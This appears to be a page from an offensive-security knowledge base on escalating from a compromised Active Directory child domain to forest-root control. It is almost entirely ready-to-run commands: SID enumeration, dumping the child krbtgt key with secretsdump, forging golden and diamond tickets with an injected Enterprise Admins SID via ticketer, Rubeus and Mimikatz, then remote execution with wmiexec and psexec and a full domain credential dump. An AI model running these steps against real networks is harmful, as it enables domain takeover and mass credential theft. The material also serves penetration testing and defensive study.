Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / Trusts / Techniques

Parent-Child

Parent-child escalation abuses the automatic two-way transitive trust inside a forest. If we compromise a child domain enough to obtain its krbtgt key, we can forge a child-domain TGT that carries the parent or forest-root privileged SID in SIDHistory.

Variables

export CHILD_DOMAIN=child.ootw.local
export CHILD_DC=10.10.10.210
export ROOT_DOMAIN=ootw.local
export ROOT_DC=10.10.10.200
export CHILD_SID='S-1-5-21-1111111111-2222222222-3333333333'
export ROOT_SID='S-1-5-21-4444444444-5555555555-6666666666'

Get child domain SID

lookupsid.py child.ootw.local/childadmin:'Password123!'@10.10.10.210
ldapsearch -LLL -x -H ldap://10.10.10.210 -D 'child.ootw.local\childadmin' -w 'Password123!' -b 'DC=child,DC=ootw,DC=local' '(objectClass=domain)' objectSid

Get root Enterprise Admins SID

ldapsearch -LLL -x -H ldap://10.10.10.200 -D 'child.ootw.local\childadmin' -w 'Password123!' -b 'DC=ootw,DC=local' '(&(samAccountType=268435456)(samAccountName=Enterprise Admins))' objectSid

Dump child krbtgt

secretsdump.py child.ootw.local/childadmin:'Password123!'@10.10.10.210 -just-dc-user krbtgt

Forge from Linux with AES

ticketer.py -aesKey <CHILD_KRBTGT_AES256> -domain child.ootw.local -domain-sid $CHILD_SID -extra-sid $ROOT_SID-519 Administrator
export KRB5CCNAME=Administrator.ccache
klist

Use the ticket against the root domain

wmiexec.py -k -no-pass ootw.local/Administrator@dc01.ootw.local -dc-ip 10.10.10.200

psexec.py -k -no-pass ootw.local/Administrator@dc01.ootw.local -dc-ip 10.10.10.200

secretsdump.py -k -no-pass ootw.local/Administrator@dc01.ootw.local -dc-ip 10.10.10.200 -just-dc

Forge from Windows with Rubeus

Rubeus.exe golden /aes256:<CHILD_KRBTGT_AES256> /user:Administrator /domain:child.ootw.local /sid:<CHILD_SID> /sids:<ROOT_SID>-519 /ptt
klist

dir \\dc01.ootw.local\c$

Forge from Windows with Mimikatz

mimikatz.exe "privilege::debug" "kerberos::golden /user:Administrator /domain:child.ootw.local /sid:<CHILD_SID> /krbtgt:<CHILD_KRBTGT_NTLM> /sids:<ROOT_SID>-519 /ptt" "exit"

dir \\dc01.ootw.local\c$

Diamond ticket variant

Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /domain:child.ootw.local /sids:<ROOT_SID>-519 /krbkey:<CHILD_KRBTGT_AES256> /ptt

Important values

/domain  child domain FQDN
/sid     child domain SID
/sids    parent or forest-root privileged SID, commonly <ROOT_SID>-519 for Enterprise Admins
/aes256  child domain krbtgt AES256 key

Notes

This is not a generic golden ticket. The escalation comes from the extra SID in the PAC. The forged identity belongs to the child domain, but authorization in the parent domain sees the injected parent/root SID.

Inside a normal parent-child path, this is why child domain compromise can become forest compromise. For external and forest trusts, SID filtering and trust boundaries change the result.